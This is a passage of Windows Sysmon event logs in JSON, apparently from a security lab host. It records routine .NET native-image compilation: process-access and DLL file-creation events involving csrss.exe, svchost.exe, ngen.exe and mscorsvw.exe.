06:59:54.790","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12EA-5F25-0000-0010B84E0A00}","TargetProcessId":"2380","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:59:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:54","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7075,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:54.790\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-12EA-5F25-0000-0010B84E0A00}\r\nTargetProcessId: 2380\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:54.790","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-12EA-5F25-0000-0010B84E0A00}","TargetProcessId":"2380","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:54","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7076,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:59:54.884\r\nProcessGuid: {E2A3D6B1-12EA-5F25-0000-0010B84E0A00}\r\nProcessId: 2380\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\94c-0\\CustomMarshalers.dll\r\nCreationUtcTime: 2020-08-01 06:59:54.884","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:59:54.884","ProcessGuid":"{E2A3D6B1-12EA-5F25-0000-0010B84E0A00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\94c-0\\CustomMarshalers.dll","CreationUtcTime":"2020-08-01 06:59:54.884","EventReceivedTime":"2020-08-01 06:59:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:54","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7077,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:54.915\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-12EA-5F25-0000-001036520A00}\r\nTargetProcessId: 5052\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:54.915","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-12EA-5F25-0000-001036520A00}","TargetProcessId":"5052","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:54","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7078,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:54.915\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12EA-5F25-0000-001036520A00}\r\nTargetProcessId: 5052\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:54.915","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12EA-5F25-0000-001036520A00}","TargetProcessId":"5052","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:59:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:54","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7079,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:54.931\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-12EA-5F25-0000-001036520A00}\r\nTargetProcessId: 5052\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:54.931","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-12EA-5F25-0000-001036520A00}","TargetProcessId":"5052","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7080,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:54.993\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-12EB-5F25-0000-0010AA550A00}\r\nTargetProcessId: 884\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:54.993","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-12EB-5F25-0000-0010AA550A00}","TargetProcessId":"884","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7081,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:54.993\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12EB-5F25-0000-0010AA550A00}\r\nTargetProcessId: 884\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:54.993","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12EB-5F25-0000-0010AA550A00}","TargetProcessId":"884","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:59:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7082,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:54.993\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-12EB-5F25-0000-0010AA550A00}\r\nTargetProcessId: 884\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:54.993","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-12EB-5F25-0000-0010AA550A00}","TargetProcessId":"884","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7083,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:59:55.134\r\nProcessGuid: {E2A3D6B1-12EB-5F25-0000-0010AA550A00}\r\nProcessId: 884\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\374-0\\System.Configuration.Install.dll\r\nCreationUtcTime: 2020-08-01 06:59:55.134","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:59:55.134","ProcessGuid":"{E2A3D6B1-12EB-5F25-0000-0010AA550A00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\374-0\\System.Configuration.Install.dll","CreationUtcTime":"2020-08-01 06:59:55.134","EventReceivedTime":"2020-08-01 06:59:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
